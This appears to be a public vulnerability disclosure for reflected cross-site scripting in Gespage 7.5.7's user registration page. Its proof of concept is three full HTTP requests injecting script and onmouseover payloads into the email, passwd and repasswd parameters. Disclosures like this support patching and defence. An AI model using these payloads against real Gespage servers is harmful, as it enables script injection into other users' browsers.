Gespage is web solution providing a printer portal. Official Website: http://www.gespage.com/
The web application does not properly filter several parameters sent by users, allowing XSS code injection. These vulnerabilities allow attackers to inject code inside the client web browser, such as malicious scripts in Javascript.
Cross-site scripting (XSS) vulnerabilities in version 7.5.7 of Gespage software allow remote attackers to inject arbitrary web script or HTML via the email, passwd and repasswd parameters to webapp/users/user_reg.jsp
Proof of Concept
From the registration page, it is possible to inject malicious web code inside email, passwd and repasswd parameters. The POST request looks like the following:
Email Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1 Host: 172.16.219.191:7180 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp Content-Type: application/x-www-form-urlencoded Content-Length: 216 Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59 Connection: close Upgrade-Insecure-Requests: 1 New_User=New&username=&email=%3chtml+xmlns%3d%22http%3a%2f%2fwww.w3.org%2f1999%2fxhtml%22%3e%3cscript%3eprompt("Ahmet_Gurel_XSS")%3c%2fscript%3e%3c%2fhtml%3e&passwd=&repasswd=&fullname=&accept_term=accept&OK=Register
Passwd Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1 Host: 172.16.219.191:7180 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp Content-Type: application/x-www-form-urlencoded Content-Length: 135 Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59 Connection: close Upgrade-Insecure-Requests: 1 New_User=New&username=&email=&passwd=%22+onmouseover%3dalert(document.domain)+%3d%22&repasswd=&fullname=&accept_term=accept&OK=Register
Repasswd Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1 Host: 172.16.219.191:7180 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp Content-Type: application/x-www-form-urlencoded Content-Length: 135 Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59 Connection: close Upgrade-Insecure-Requests: 1 New_User=New&username=&email=&passwd=&repasswd=%22+onmouseover%3dalert(document.domain)+%3d%22&fullname=&accept_term=accept&OK=Register
Leave a Reply